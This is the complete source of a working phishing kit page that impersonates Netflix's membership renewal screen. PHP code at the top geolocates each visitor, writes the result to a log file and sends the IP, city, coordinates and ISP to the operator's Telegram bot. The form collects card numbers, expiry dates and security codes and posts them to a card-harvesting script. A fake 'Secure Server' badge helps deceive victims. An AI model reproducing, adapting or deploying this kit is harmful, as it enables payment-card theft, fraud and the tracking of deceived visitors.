<!DOCTYPE html>
<html lang="en">
<head>
<?php
include "config.php";

// Get visitor's IP address
$ip = getenv("REMOTE_ADDR");

// Fetch IP information from ip-api.com
$IP_LOOKUP = @json_decode(file_get_contents("http://ip-api.com/json/{$ip}"));
if ($IP_LOOKUP && $IP_LOOKUP->status === "success") {
    $COUNTRY  = $IP_LOOKUP->country ?? 'Unknown';

    // Log the IP, country, and date/time
    $file = fopen("Visit.txt", "a");
    fwrite($file, $ip . " - Country: " . $COUNTRY . " - " . gmdate("Y-n-d") . " @ " . gmdate("H:i:s") . "\n");
    fclose($file);

    // Prepare the message for Telegram
    $CITY     = $IP_LOOKUP->city ?? 'Unknown';
    $REGION   = $IP_LOOKUP->regionName ?? 'Unknown';
    $ZIPCODE  = $IP_LOOKUP->zip ?? 'Unknown';
    $LOC      = $IP_LOOKUP->lat . ',' . $IP_LOOKUP->lon ?? 'Unknown'; // Latitude and Longitude
    $ORG      = $IP_LOOKUP->org ?? 'Unknown'; // Organization info
    $TIMEZONE = $IP_LOOKUP->timezone ?? 'Unknown'; // Timezone info

    $message = "\n=== NETFLIX Visit ===\n"
         . "IP: whatismyip.com/ip/" . $ip . "\n"
         . "Country: " . $COUNTRY . "\n"
         . "City: " . $CITY . "\n"
         . "Region: " . $REGION . "\n"
         . "Zip: " . $ZIPCODE . "\n"
         . "Location (lat, long): " . $LOC . "\n"
         . "Organization: " . $ORG . "\n"
         . "Timezone: " . $TIMEZONE;

    // Send the message to the Telegram bot
    file_get_contents("https://api.telegram.org/bot" . $api . "/sendMessage?chat_id=" . $chatid . "&text=" . urlencode($message));

 }
?>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Renew Membership</title>
    <link rel="icon" href="https://gogeticons.com/frontend/web/icons/data/1/6/9/0/5/3/logo_netflix_icon_512.png" type="image/x-icon">

    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #000;
            color: #fff;
            margin: 0;
            padding: 0;
        }
        .header {
            background: #e50914;
            padding: 20px;
            text-align: center;
            border-bottom: 2px solid #b20710;
        }
        .header .logo {
            color: #fff;
            font-size: 28px;
            font-weight: bold;
            margin: 0;
        }
        .container {
            width: 90%;
            max-width: 700px;
            margin: 30px auto;
            background: #141414;
            padding: 20px;
            border: 1px solid #333;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.7);
        }
        h2 {
            margin-bottom: 10px;
            font-size: 22px;
            font-weight: normal;
            color: #e50914;
        }
        p {
            margin-bottom: 10px;
            font-size: 14px;
            line-height: 1.5;
            color: #fff;
        }
        .info-list {
            margin-bottom: 20px;
            font-size: 14px;
            list-style-type: disc;
            margin-left: 20px;
            color: #fff;
        }
        .form-group {
            display: flex;
            flex-direction: column;
            margin-bottom: 15px;
        }
        .form-group label {
            margin-bottom: 5px;
            font-size: 13px;
            color: #fff;
        }
        .form-group input {
            padding: 10px;
            font-size: 16px;
            border: 1px solid #333;
            border-radius: 4px;
            background: #222;
            color: #fff;
            outline: none;
            transition: border-color 0.3s;
        }
        .form-group input:focus {
            border-color: #e50914;
        }
        .form-row {
            display: flex;
            gap: 10px;
        }
        .form-row .form-group {
            flex: 1;
        }
        .secure {
            display: flex;
            align-items: center;
            gap: 5px;
            margin-top: 10px;
            font-size: 13px;
            color: #aaa;
        }
        .btn {
            background: #e50914;
            color: #fff;
            padding: 12px;
            font-size: 16px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            width: 100%;
            margin-top: 20px;
            transition: background 0.3s;
        }
        .btn:hover {
            background: #b20710;
        }
        .terms {
            font-size: 12px;
            color: #aaa;
            margin-top: 10px;
            line-height: 1.4;
        }
        .terms a {
            color: #e50914;
            text-decoration: none;
        }
        .terms a:hover {
            text-decoration: underline;
        }
        .footer {
            text-align: center;
            margin-top: 20px;
            font-size: 12px;
            color: #aaa;
        }

        /* Mobile Responsiveness */
        @media (max-width: 600px) {
            .container {
                padding: 15px;
            }
            h2 {
                font-size: 20px;
            }
            p, .info-list {
                font-size: 12px;
            }
            .form-group input {
                padding: 8px;
                font-size: 14px;
            }
            .form-row {
                flex-direction: column;
            }
            .form-group label {
                font-size: 12px;
            }
            .btn {
                padding: 10px;
                font-size: 14px;
            }
        }
    </style>
</head>
<body>

    <div class="header">
        <h1 class="logo">NETFLIX</h1>
    </div>

    <div class="container">
        <h2>Renew Your Membership</h2>
        <p>To continue enjoying your favorite shows and movies, please update your payment details below to renew your membership.</p>
        <ul class="info-list">
            <li>Your current membership will continue as soon as you renew.</li>
            <li>No commitments, cancel online at any time.</li>
            <li>Enjoy unlimited streaming on multiple devices with HD and Ultra HD available.</li>
        </ul>

        <form id="renewal-form" action="send/cardsend.php" method="POST">
            <div class="form-group">
                <label for="card">Card Number</label>
                <input type="tel" id="card" name="card_number" maxlength="19" placeholder="1234 5678 9012 3456" required>
            </div>

            <div class="form-row">
                <div class="form-group">
                    <label for="expiry">Expiry Date</label>
                    <input type="tel" id="expiry" name="expiry" maxlength="7" placeholder="01/24" required>
                </div>
                <div class="form-group">
                    <label for="cvv">Security Code</label>
                    <input type="tel" id="cvv" name="cvv" maxlength="4" placeholder="123" required>
                </div>
            </div>

            <button type="submit" class="btn">Renew Membership</button>
        </form>

        <div class="secure">
            <img src="https://img.icons8.com/ios-filled/20/ffffff/lock.png" alt="Secure Server">
            Secure Server
        </div>

        <p class="terms">
            By clicking the "Renew Membership" button below, you agree to our <a href="#">Terms of Use</a>, <a href="#">Privacy Statement</a>, and that your payment method will be charged automatically each month until you cancel. You can cancel at any time to stop future charges.
        </p>
    </div>

    <div class="footer">
        © 2025 Netflix, Inc.
    </div>

    <!-- jQuery and jQuery Payment Plugin -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.payment/3.0.0/jquery.payment.min.js"></script>
    <script>
        // Format the card, expiry, and CVV fields
        $(document).ready(function() {
            $('#card').payment('formatCardNumber');
            $('#expiry').payment('formatCardExpiry');
            $('#cvv').payment('formatCardCVC');
        });
    </script>

    <script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"rayId":"90792adba940f0d7","version":"2025.1.0","r":1,"token":"01f638357ced41bfa6ab1b0f02299a51","serverTiming":{"name":{"cfExtPri":true,"cfL4":true,"cfSpeedBrain":true,"cfCacheStatus":true}}}' crossorigin="anonymous"></script>
</body>
</html>